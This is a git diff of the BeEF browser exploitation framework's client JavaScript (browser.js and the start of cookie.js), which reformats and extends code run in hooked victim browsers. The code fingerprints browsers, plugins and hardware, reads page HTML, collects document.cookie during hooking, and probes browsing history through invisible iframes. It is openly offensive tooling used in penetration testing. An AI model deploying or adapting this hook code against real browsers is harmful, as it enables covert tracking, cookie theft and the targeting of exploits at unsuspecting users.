ActiveXObject("VideoLAN.VLCPlugin.2"); + vlc = true ; + } catch(e) { + beef.debug("Creating VLC ActiveX object failed: "+e.message); + } + } + return vlc; + }, + + /** + * Checks if the zombie has Java enabled. + * @return: {Boolean} true or false. * * @example: if(beef.browser.javaEnabled()) { ... } */ - javaEnabled: function() { + javaEnabled:function () { + //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit) + // versionJRE = deployJava.getJREs(); - return (!!window.navigator.javaEnabled()); - - }, + // if(versionJRE != '') + // return true; + // else + return false; - /** - * Checks if the Phonegap API is available from the hooked domain. - * @return: {Boolean} true or false. - * - * @example: if(beef.browser.hasJava()) { ... } - */ - hasPhonegap: function() { - var result = false; - try { if (!!device.phonegap) result = true; else result = false; } - catch(e) { result = false; } - return result; - }, + }, - /** - * Checks if the zombie has Java installed and enabled. - * @return: {Boolean} true or false. - * - * @example: if(beef.browser.hasJava()) { ... } - */ - hasJava: function() { + /** + * Checks if the Phonegap API is available from the hooked domain. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasPhonegap()) { ... } + */ + hasPhonegap:function () { + var result = false; + + try { + if (!!device.phonegap || !!device.cordova) result = true; else result = false; + } + catch (e) { + result = false; + } + return result; + }, - // Check if Java is enabled - if (!beef.browser.javaEnabled()) { - return false; - } + /** + * Checks if the browser supports CORS + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasCors()) { ... } + */ + hasCors:function () { + if ('withCredentials' in new XMLHttpRequest()) + return true; + else if (typeof XDomainRequest !== "undefined") + return true; + else + return false; + }, - // This is a temporary fix as this does not work on Safari and Chrome - // Chrome requires manual user intervention even with unsigned applets. - // Safari requires a few seconds to load the applet. - if (beef.browser.isC() || beef.browser.isS()) { - return true; - } + /** + * Checks if the zombie has Java installed and enabled. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasJava()) { ... } + */ + hasJava:function () { - // Inject an unsigned java applet to double check if the Java - // plugin is working fine. - try { - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar'; - var applet_id = 'checkJava'; - var applet_name = 'checkJava'; - var output; - beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' , - null, applet_archive, null); - output = document.Microsoft_Corporation.getInfo(); - beef.dom.detachApplet('checkJava'); - return output = 1; - } catch(e) { - return false; - } - return false; - }, - - /** - * Checks if the zombie has VBScript enabled. - * @return: {Boolean} true or false. - * - * @example: if(beef.browser.hasVBScript()) { ... } - */ - hasVBScript: function() { - if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) { - return true; - } else { - return false; - } - }, - - /** - * Returns the list of plugins installed in the browser. - */ - getPlugins: function() { + return beef.browser.javaEnabled(); - var results; - Array.prototype.unique = function() { - var o = {}, i, l = this.length, r = []; - for(i=0; i 0) { - results = new Array(); - for (var i=0; i < navigator.plugins.length; i++) { + /** + * Returns the list of plugins installed in the browser. + */ + getPlugins:function () { - // Firefox returns exact plugin versions - if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; + var results; + Array.prototype.unique = function () { + var o = {}, i, l = this.length, r = []; + for (i = 0; i < l; i += 1) o[this[i]] = this[i]; + for (i in o) r.push(o[i]); + return r; + }; - // Webkit and Presto (Opera) - // Don't support the version attribute - // Sometimes store the version in description (Real, Adobe) - else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description; - } - results = results.unique().toString(); + // Internet Explorer + if (this.isIE()) this.getPluginsIE(); - // All browsers that don't support navigator.plugins - } else results = 'navigator.plugins is not supported in this browser!'; + // All other browsers that support navigator.plugins + else if (navigator.plugins && navigator.plugins.length > 0) { + results = new Array(); + for (var i = 0; i < navigator.plugins.length; i++) { - // Return results - return results; - }, - - /** - * Returns a list of plugins detected by IE. This is a hack because IE doesn't - * support navigator.plugins - */ - getPluginsIE: function() { + // Firefox returns exact plugin versions + if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; + + // Webkit and Presto (Opera) + // Don't support the version attribute + // Sometimes store the version in description (Real, Adobe) + else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description; + } + results = results.unique().toString(); + + // All browsers that don't support navigator.plugins + } else { + results = new Array(); + //firefox https://bugzilla.mozilla.org/show_bug.cgi?id=757726 + // On linux sistem the "version" slot is empty so I'll attach "description" after version + var plugins = { + + 'AdobeAcrobat':{ + 'control':'Adobe Acrobat', + 'return':function (control) { + try { + version = navigator.plugins["Adobe Acrobat"]["description"]; + return 'Adobe Acrobat Version ' + version; //+ " description "+ filename; + + } + catch (e) { + } + + + }}, + 'Flash':{ + 'control':'Shockwave Flash', + 'return':function (control) { + try { + version = navigator.plugins["Shockwave Flash"]["description"]; + return 'Flash Player Version ' + version; //+ " description "+ filename; + } + + catch (e) { + } + }}, + 'Google_Talk_Plugin_Accelerator':{ + 'control':'Google Talk Plugin Video Accelerator', + 'return':function (control) { + + try { + version = navigator.plugins['Google Talk Plugin Video Accelerator']["description"]; + return 'Google Talk Plugin Video Accelerator Version ' + version; //+ " description "+ filename; + } + catch (e) { + } + }}, + 'Google_Talk_Plugin':{ + 'control':'Google Talk Plugin', + 'return':function (control) { + try { + version = navigator.plugins['Google Talk Plugin']["description"]; + return 'Google Talk Plugin Version ' + version;// " description "+ filename; + } + catch (e) { + } + }}, + 'Facebook_Video_Calling_Plugin':{ + 'control':'Facebook Video Calling Plugin', + 'return':function (control) { + try { + version = navigator.plugins["Facebook Video Calling Plugin"]["description"]; + return 'Facebook Video Calling Plugin Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'Google_Update':{ + 'control':'Google Update', + 'return':function (control) { + try { + version = navigator.plugins["Google Update"]["description"]; + return 'Google Update Version ' + version//+ " description "+ filename; + } + catch (e) { + } + }}, + 'Windows_Activation_Technologies':{ + 'control':'Windows Activation Technologies', + 'return':function (control) { + try { + version = navigator.plugins["Windows Activation Technologies"]["description"]; + return 'Windows Activation Technologies Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + + }}, + 'VLC_Web_Plugin':{ + 'control':'VLC Web Plugin', + 'return':function (control) { + try { + version = navigator.plugins["VLC Web Plugin"]["description"]; + return 'VLC Web Plugin Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'Google_Earth_Plugin':{ + 'control':'Google Earth Plugin', + + 'return':function (control) { + try { + version = navigator.plugins['Google Earth Plugin']["description"]; + return 'Google Earth Plugin Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'Silverlight_Plug-In':{ + 'control':'Silverlight Plug-In', + 'return':function (control) { + try { + version = navigator.plugins['Silverlight Plug-In']["description"]; + return 'Silverlight Plug-In Version ' + version;//+ " description "+ filename; + } + catch (e) { + } + }}, + 'FoxitReader_Plugin':{ + 'control':'FoxitReader Plugin', + 'return':function (control) { + try { + version = navigator.plugins['Foxit Reader Plugin for Mozilla']['version']; + return 'FoxitReader Plugin Version ' + version; + } catch (e) { + } + }} + }; + + var c = 0; + for (var i in plugins) { + //each element od plugins + var control = plugins[i]['control']; + try { + var version = plugins[i]['return'](control); + if (version) { + results[c] = version; + c = c + 1; + } + } + catch (e) { + } + + } + } + // Return results + return results; + }, + + /** + * Returns a list of plugins detected by IE. This is a hack because IE doesn't + * support navigator.plugins + */ + getPluginsIE:function () { var results = ''; var plugins = {'AdobePDF6':{ - 'control':'PDF.PdfCtrl', - 'return': function(control) { + 'control':'PDF.PdfCtrl', + 'return':function (control) { version = control.getVersions().split(','); version = version[0].split('='); - return 'Acrobat Reader v'+parseFloat(version[1]); - }}, + return 'Acrobat Reader v' + parseFloat(version[1]); + }}, 'AdobePDF7':{ - 'control':'AcroPDF.PDF', - 'return': function(control) { - version = control.getVersions().split(','); - version = version[0].split('='); - return 'Acrobat Reader v'+parseFloat(version[1]); - }}, + 'control':'AcroPDF.PDF', + 'return':function (control) { + version = control.getVersions().split(','); + version = version[0].split('='); + return 'Acrobat Reader v' + parseFloat(version[1]); + }}, 'Flash':{ - 'control':'ShockwaveFlash.ShockwaveFlash', - 'return': function(control) { - version = control.getVariable('$version').substring(4); - return 'Flash Player v'+version.replace(/,/g, "."); - }}, + 'control':'ShockwaveFlash.ShockwaveFlash', + 'return':function (control) { + version = control.getVariable('$version').substring(4); + return 'Flash Player v' + version.replace(/,/g, "."); + }}, 'Quicktime':{ - 'control': 'QuickTime.QuickTime', - 'return': function(control) { - return 'QuickTime Player'; - }}, + 'control':'QuickTime.QuickTime', + 'return':function (control) { + return 'QuickTime Player'; + }}, 'RealPlayer':{ - 'control': 'RealPlayer', - 'return': function(control) { - version = control.getVersionInfo(); - return 'RealPlayer v'+parseFloat(version); - }}, + 'control':'RealPlayer', + 'return':function (control) { + version = control.getVersionInfo(); + return 'RealPlayer v' + parseFloat(version); + }}, 'Shockwave':{ - 'control': 'SWCtl.SWCtl', - 'return': function(control) { - version = control.ShockwaveVersion('').split('r'); - return 'Shockwave v'+parseFloat(version[0]); - }}, - 'WindowsMediaPlayer': { - 'control': 'WMPlayer.OCX', - 'return': function(control) { - return 'Windows Media Player v'+parseFloat(control.versionInfo); - }} - }; + 'control':'SWCtl.SWCtl', + 'return':function (control) { + version = control.ShockwaveVersion('').split('r'); + return 'Shockwave v' + parseFloat(version[0]); + }}, + 'WindowsMediaPlayer':{ + 'control':'WMPlayer.OCX', + 'return':function (control) { + return 'Windows Media Player v' + parseFloat(control.versionInfo); + }}, + 'FoxitReaderPlugin':{ + 'control':'FoxitReader.FoxitReaderCtl.1', + 'return':function (control) { + return 'Foxit Reader Plugin v' + parseFloat(control.versionInfo); + }} + }; if (window.ActiveXObject) { var j = 0; - for (var i in plugins) - { + for (var i in plugins) { var control = null; var version = null; try { control = new ActiveXObject(plugins[i]['control']); - } catch (e) { } - if (control) - { + } catch (e) { + } + if (control) { if (j != 0) results += ', '; results += plugins[i]['return'](control); @@ -774,294 +1682,394 @@ beef.browser = { return results; }, - /** - * Returns zombie screen size and color depth. - */ - getScreenSize: function() { - return { - width: window.screen.width, - height: window.screen.height, - colordepth: window.screen.colorDepth - } - }, + /** + * Returns zombie screen size and color depth. + */ + getScreenSize:function () { + return { + width:window.screen.width, + height:window.screen.height, + colordepth:window.screen.colorDepth + } + }, - /** - * Returns zombie browser window size. - * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow - */ - getWindowSize: function() { - var myWidth = 0, myHeight = 0; - if( typeof( window.innerWidth ) == 'number' ) { - // Non-IE - myWidth = window.innerWidth; - myHeight = window.innerHeight; - } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) { - // IE 6+ in 'standards compliant mode' - myWidth = document.documentElement.clientWidth; - myHeight = document.documentElement.clientHeight; - } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) { - // IE 4 compatible - myWidth = document.body.clientWidth; - myHeight = document.body.clientHeight; - } - return { - width: myWidth, - height: myHeight - } - }, - - /** - * Construct hash from browser details. This function is used to grab the browser details during the hooking process - */ - getDetails: function() { - var details = new Array(); - - var browser_name = beef.browser.getBrowserName(); - var browser_version = beef.browser.getBrowserVersion(); - var browser_reported_name = beef.browser.getBrowserReportedName(); - var cookies = document.cookie; - var page_title = (document.title) ? document.title : "No Title"; - var page_uri = document.location.href; - var page_referrer = (document.referrer) ? document.referrer : "No Referrer"; - var hostname = document.location.hostname; - var hostport = (document.location.port)? document.location.port : "80"; - var browser_plugins = beef.browser.getPlugins(); - var date_stamp = new Date().toString(); - var os_name = beef.os.getName(); - var hw_name = beef.hardware.getName(); - var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; - var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); - var screen_size = beef.browser.getScreenSize(); - var window_size = beef.browser.getWindowSize(); - var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; - var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; - var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; - var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No"; - var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; - var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No"; - var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No"; - var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie"))? "Yes":"No"; - var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie"))? "Yes":"No"; + /** + * Returns zombie browser window size. + * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow + */ + getWindowSize:function () { + var myWidth = 0, myHeight = 0; + if (typeof( window.innerWidth ) == 'number') { + // Non-IE + myWidth = window.innerWidth; + myHeight = window.innerHeight; + } else if (document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )) { + // IE 6+ in 'standards compliant mode' + myWidth = document.documentElement.clientWidth; + myHeight = document.documentElement.clientHeight; + } else if (document.body && ( document.body.clientWidth || document.body.clientHeight )) { + // IE 4 compatible + myWidth = document.body.clientWidth; + myHeight = document.body.clientHeight; + } + return { + width:myWidth, + height:myHeight + } + }, - if(browser_name) details["BrowserName"] = browser_name; - if(browser_version) details["BrowserVersion"] = browser_version; - if(browser_reported_name) details["BrowserReportedName"] = browser_reported_name; - if(cookies) details["Cookies"] = cookies; - if(page_title) details["PageTitle"] = page_title; - if(page_uri) details["PageURI"] = page_uri; - if(page_referrer) details["PageReferrer"] = page_referrer; - if(hostname) details["HostName"] = hostname; - if(hostport) details["HostPort"] = hostport; - if(browser_plugins) details["BrowserPlugins"] = browser_plugins; - if(os_name) details['OsName'] = os_name; - if(hw_name) details['Hardware'] = hw_name; - if(date_stamp) details['DateStamp'] = date_stamp; - if(system_platform) details['SystemPlatform'] = system_platform; - if(browser_type) details['BrowserType'] = browser_type; - if(screen_size) details['ScreenSize'] = screen_size; - if(window_size) details['WindowSize'] = window_size; - if(java_enabled) details['JavaEnabled'] = java_enabled; - if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled - if(has_flash) details['HasFlash'] = has_flash - if(has_phonegap) details['HasPhonegap'] = has_phonegap - if(has_web_socket) details['HasWebSocket'] = has_web_socket - if(has_googlegears) details['HasGoogleGears'] = has_googlegears - if(has_activex) details['HasActiveX'] = has_activex; - if(has_session_cookies) details["hasSessionCookies"] = has_session_cookies; - if(has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies; + /** + * Construct hash from browser details. This function is used to grab the browser details during the hooking process + */ + getDetails:function () { + var details = new Array(); - return details; - }, - - /** - * Returns array of results, whether or not the target zombie has visited the specified URL - */ - hasVisited: function(urls) { - var results = new Array(); - var iframe = beef.dom.createInvisibleIframe(); - var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document; - ifdoc.open(); - ifdoc.write(''); - ifdoc.close(); - urls = urls.split("\n"); - var count = 0; - for (var i in urls) - { - var u = urls[i]; - if (u != "" || u != null) - { - var success = false; - var a = ifdoc.createElement('a'); - a.href = u; - ifdoc.body.appendChild(a); - var width = null; - (a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width"); - if (width == '0px') { - success = true; - } - results.push({'url':u, 'visited':success}); - count++; - } - } - beef.dom.removeElement(iframe); - if (results.length == 0) - { - return false; - } - return results; - }, + var browser_name = beef.browser.getBrowserName(); + var browser_version = beef.browser.getBrowserVersion(); + var browser_reported_name = beef.browser.getBrowserReportedName(); + var page_title = (document.title) ? document.title : "Unknown"; + var page_uri = (document.location.href) ? document.location.href : "Unknown"; + var page_referrer = (document.referrer) ? document.referrer : "Unknown"; + var hostname = (document.location.hostname) ? document.location.hostname : "Unknown"; + var hostport = (document.location.port) ? document.location.port : "80"; + var browser_plugins = beef.browser.getPlugins(); + var date_stamp = new Date().toString(); + var os_name = beef.os.getName(); + var hw_name = beef.hardware.getName(); + var cpu_type = beef.hardware.cpuType(); + var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No"; + var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; + var browser_type = JSON.stringify(beef.browser.type(), function (key, value) { + if (value == true) return value; else if (typeof value == 'object') return value; else return; + }); + var screen_size = beef.browser.getScreenSize(); + var window_size = beef.browser.getWindowSize(); + var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No"; + var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No"; + var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No"; + var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No"; + var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No"; + var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No"; + var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No"; + var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No"; + var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No"; + var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No"; + var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; + var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No"; + try{ + var cookies = document.cookie; + var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No"; + var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No"; + if (cookies) details['Cookies'] = cookies; + if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies; + if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies; + }catch(e){ + // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way, + // and there is no reason to read cookies at this point + details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly."; + details['hasSessionCookies'] = "No"; + details['hasPersistentCookies'] = "No"; + } - /** - * Checks if the zombie has Web Sockets enabled. - * @return: {Boolean} true or false. - * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket - * */ - hasWebSocket: function() { - if (!!window.WebSocket || !!window.MozWebSocket) return true; else return false; - }, + if (browser_name) details['BrowserName'] = browser_name; + if (browser_version) details['BrowserVersion'] = browser_version; + if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name; + if (page_title) details['PageTitle'] = page_title; + if (page_uri) details['PageURI'] = page_uri; + if (page_referrer) details['PageReferrer'] = page_referrer; + if (hostname) details['HostName'] = hostname; + if (hostport) details['HostPort'] = hostport; + if (browser_plugins) details['BrowserPlugins'] = browser_plugins; + if (os_name) details['OsName'] = os_name; + if (hw_name) details['Hardware'] = hw_name; + if (cpu_type) details['CPU'] = cpu_type; + if (touch_enabled) details['TouchEnabled'] = touch_enabled; + if (date_stamp) details['DateStamp'] = date_stamp; + if (browser_platform) details['BrowserPlatform'] = browser_platform; + if (browser_type) details['BrowserType'] = browser_type; + if (screen_size) details['ScreenSize'] = screen_size; + if (window_size) details['WindowSize'] = window_size; + if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled; + if (has_flash) details['HasFlash'] = has_flash; + if (has_phonegap) details['HasPhonegap'] = has_phonegap; + if (has_web_socket) details['HasWebSocket'] = has_web_socket; + if (has_googlegears) details['HasGoogleGears'] = has_googlegears; + if (has_webrtc) details['HasWebRTC'] = has_webrtc; + if (has_activex) details['HasActiveX'] = has_activex; + if (has_silverlight) details['HasSilverlight'] = has_silverlight; + if (has_quicktime) details['HasQuickTime'] = has_quicktime; + if (has_realplayer) details['HasRealPlayer'] = has_realplayer; + if (has_wmp) details['HasWMP'] = has_wmp; + if (has_foxit) details['HasFoxit'] = has_foxit; - /** - * Checks if the zombie has Google Gears installed. - * @return: {Boolean} true or false. - * - * @from: https://code.google.com/apis/gears/gears_init.js - * */ - hasGoogleGears: function() { + return details; + }, - var ggfactory = null; + /** + * Returns boolean value depending on whether the browser supports ActiveX + */ + hasActiveX:function () { + return !!window.ActiveXObject; + }, - // Chrome - if (window.google && google.gears) return true; + /** + * Returns boolean value depending on whether the browser supports WebRTC + */ + hasWebRTC:function () { + return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection); + }, - // Firefox - if (typeof GearsFactory != 'undefined') { - ggfactory = new GearsFactory(); - } else { - // IE - try { - ggfactory = new ActiveXObject('Gears.Factory'); - // IE Mobile on WinCE. - if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) { - ggfactory.privateSetGlobalObject(this); - } - } catch (e) { - // Safari - if ((typeof navigator.mimeTypes != 'undefined') - && navigator.mimeTypes["application/x-googlegears"]) { - ggfactory = document.createElement("object"); - ggfactory.style.display = "none"; - ggfactory.width = 0; - ggfactory.height = 0; - ggfactory.type = "application/x-googlegears"; - document.documentElement.appendChild(ggfactory); - if(ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null; - } - } - } - if (!ggfactory) return false; else return true; - }, + /** + * Returns boolean value depending on whether the browser supports Silverlight + */ + hasSilverlight:function () { + var result = false; - /** - * Dynamically changes the favicon: works in Firefox, Chrome and Opera - **/ - changeFavicon: function(favicon_url) { - var iframe = null; - if (this.isC()) { - iframe = document.createElement('iframe'); - iframe.src = 'about:blank'; - iframe.style.display = 'none'; - document.body.appendChild(iframe); - } - var link = document.createElement('link'), - oldLink = document.getElementById('dynamic-favicon'); - link.id = 'dynamic-favicon'; - link.rel = 'shortcut icon'; - link.href = favicon_url; - if (oldLink) document.head.removeChild(oldLink); - document.head.appendChild(link); - if (this.isC()) iframe.src += ''; - }, + try { + if (beef.browser.isIE()) { + var slControl = new ActiveXObject('AgControl.AgControl'); + result = true; + } else if (navigator.plugins["Silverlight Plug-In"]) { + result = true; + } + } catch (e) { + result = false; + } - /** - * Changes page title - **/ - changePageTitle: function(title) { - document.title = title; - }, + return result; + }, - /** - * A function that gets the max number of simultaneous connections the - * browser can make per domain, or globally on all domains. - * - * This code is based on research from browserspy.dk - * - * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default} - * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes - * the number of connections to the callback function as "this" - * - * example usage: - * $j.when(getMaxConnections()).done(function(){ - * console.debug("Max Connections: " + this); - * }); - * - */ - getMaxConnections: function(scope) { + /** + * Returns array of results, whether or not the target zombie has visited the specified URL + */ + hasVisited:function (urls) { + var results = new Array(); + var iframe = beef.dom.createInvisibleIframe(); + var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document; + ifdoc.open(); + ifdoc.write(''); + ifdoc.close(); + urls = urls.split("\n"); + var count = 0; + for (var i in urls) { + var u = urls[i]; + if (u != "" || u != null) { + var success = false; + var a = ifdoc.createElement('a'); + a.href = u; + ifdoc.body.appendChild(a); + var width = null; + (a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width"); + if (width == '0px') { + success = true; + } + results.push({'url':u, 'visited':success}); + count++; + } + } + beef.dom.removeElement(iframe); + if (results.length == 0) { + return false; + } + return results; + }, - var imagesCount = 30; // Max number of images to test - var secondsTimeout = 5; // Image load timeout threashold - var testUrl =""; // The image testing service URL + /** + * Checks if the zombie has Web Sockets enabled. + * @return: {Boolean} true or false. + * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket + * */ + hasWebSocket:function () { + return !!window.WebSocket || !!window.MozWebSocket; + }, - // User broserspy.dk max connections service URL. - if(scope=='PER_DOMAIN') - testUrl = "http://browserspy.dk/connections.php?img=1&random="; - else - // The token will be replaced by a different number with each request(different domain). - testUrl = "http://.browserspy.dk/connections.php?img=1&random="; + /** + * Checks if the zombie has Google Gears installed. + * @return: {Boolean} true or false. + * + * @from: https://code.google.com/apis/gears/gears_init.js + * */ + hasGoogleGears:function () { + + var ggfactory = null; + + // Chrome + if (window.google && google.gears) return true; + + // Firefox + if (typeof GearsFactory != 'undefined') { + ggfactory = new GearsFactory(); + } else { + // IE + try { + ggfactory = new ActiveXObject('Gears.Factory'); + // IE Mobile on WinCE. + if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) { + ggfactory.privateSetGlobalObject(this); + } + } catch (e) { + // Safari + if ((typeof navigator.mimeTypes != 'undefined') + && navigator.mimeTypes["application/x-googlegears"]) { + ggfactory = document.createElement("object"); + ggfactory.style.display = "none"; + ggfactory.width = 0; + ggfactory.height = 0; + ggfactory.type = "application/x-googlegears"; + document.documentElement.appendChild(ggfactory); + if (ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null; + } + } + } + if (!ggfactory) return false; else return true; + }, + + /** + * Checks if the zombie has Foxit PDF reader plugin. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasFoxit()) { ... } + * */ + hasFoxit:function () { + + var foxitplugin = false; + + try { + if (beef.browser.isIE()) { + var foxitControl = new ActiveXObject('FoxitReader.FoxitReaderCtl.1'); + foxitplugin = true; + } else if (navigator.plugins['Foxit Reader Plugin for Mozilla']) { + foxitplugin = true; + } + } catch (e) { + foxitplugin = false; + } + + return foxitplugin; + }, + + /** + * Returns the page head HTML + **/ + getPageHead:function () { + var html_head; + try { + html_head = document.head.innerHTML.toString(); + } catch (e) { + } + return html_head; + }, + + /** + * Returns the page body HTML + **/ + getPageBody:function() { + var html_body; + try { + html_body = document.body.innerHTML.toString(); + } catch (e) { + } + return html_body; + }, + + /** + * Dynamically changes the favicon: works in Firefox, Chrome and Opera + **/ + changeFavicon:function (favicon_url) { + var iframe = null; + if (this.isC()) { + iframe = document.createElement('iframe'); + iframe.src = 'about:blank'; + iframe.style.display = 'none'; + document.body.appendChild(iframe); + } + var link = document.createElement('link'), + oldLink = document.getElementById('dynamic-favicon'); + link.id = 'dynamic-favicon'; + link.rel = 'shortcut icon'; + link.href = favicon_url; + if (oldLink) document.head.removeChild(oldLink); + document.head.appendChild(link); + if (this.isC()) iframe.src += ''; + }, + + /** + * Changes page title + **/ + changePageTitle:function (title) { + document.title = title; + }, + + /** + * A function that gets the max number of simultaneous connections the + * browser can make per domain, or globally on all domains. + * + * This code is based on research from browserspy.dk + * + * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default} + * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes + * the number of connections to the callback function as "this" + * + * example usage: + * $j.when(getMaxConnections()).done(function(){ + * console.debug("Max Connections: " + this); + * }); + * + */ + getMaxConnections:function (scope) { + + var imagesCount = 30; // Max number of images to test + var secondsTimeout = 5; // Image load timeout threashold + var testUrl = ""; // The image testing service URL + + // User broserspy.dk max connections service URL. + if (scope == 'PER_DOMAIN') + testUrl = "http://browserspy.dk/connections.php?img=1&random="; + else + // The token will be replaced by a different number with each request(different domain). + testUrl = "http://.browserspy.dk/connections.php?img=1&random="; - var imagesLoaded = 0; // Number of responding images before timeout. - var imagesRequested = 0; // Number of requested images. - var testImages = new Array(); // Array of all images. - var deferredObject = $j.Deferred(); // A jquery Deferred object. + var imagesLoaded = 0; // Number of responding images before timeout. + var imagesRequested = 0; // Number of requested images. + var testImages = new Array(); // Array of all images. + var deferredObject = $j.Deferred(); // A jquery Deferred object. - for (var i = 1; i <= imagesCount; i++) - { - // Asynchronously request image. - testImages[i] = - $j.ajax({ - type: "get", - dataType: true, - url: (testUrl.replace("",i)) + Math.random(), - data: "", - timeout: (secondsTimeout * 1000), + for (var i = 1; i <= imagesCount; i++) { + // Asynchronously request image. + testImages[i] = + $j.ajax({ + type:"get", + dataType:true, + url:(testUrl.replace("", i)) + Math.random(), + data:"", + timeout:(secondsTimeout * 1000), - // Function on completion of request. - complete: function(jqXHR, textStatus){ + // Function on completion of request. + complete:function (jqXHR, textStatus) { - imagesRequested++; + imagesRequested++; - // If the image returns a 200 or a 302, the text Status is "error", else null - if(textStatus == "error") - { - imagesLoaded++; - } + // If the image returns a 200 or a 302, the text Status is "error", else null + if (textStatus == "error") { + imagesLoaded++; + } - // If all images requested - if(imagesRequested >= imagesCount) - { - // resolve the deferred object passing the number of loaded images. - deferredObject.resolveWith(imagesLoaded); - } - } - }); + // If all images requested + if (imagesRequested >= imagesCount) { + // resolve the deferred object passing the number of loaded images. + deferredObject.resolveWith(imagesLoaded); + } + } + }); - } + } - // Return a promise to resolve the deffered object when the images are loaded. - return deferredObject.promise(); + // Return a promise to resolve the deffered object when the images are loaded. + return deferredObject.promise(); + + } - } - }; beef.regCmp('beef.browser'); diff --git a/core/main/client/browser/cookie.js b/core/main/client/browser/cookie.js index d9b7cce98..9223a7f23 100644 --- a/core/main/client/browser/cookie.js +++ b/core/main/client/browser/cookie.js @@ -1,110 +1,101 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.browser.cookie - * - * Provides fuctions for working with cookies. - * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php - * Original author unknown. - * - */ -beef.browser.cookie = { - - setCookie: function (name, value, expires, path, domain, secure) - { - - var today = new Date(); - today.setTime( today.getTime() ); - - if ( expires ) - { - expires = expires * 1000 * 60 * 60 * 24; - } - var expires_date = new Date( today.getTime() + (expires) ); - - document.cookie = name + "=" +escape( value ) + - ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + - ( ( path ) ? ";path=" + path : "" ) + - ( ( domain ) ? 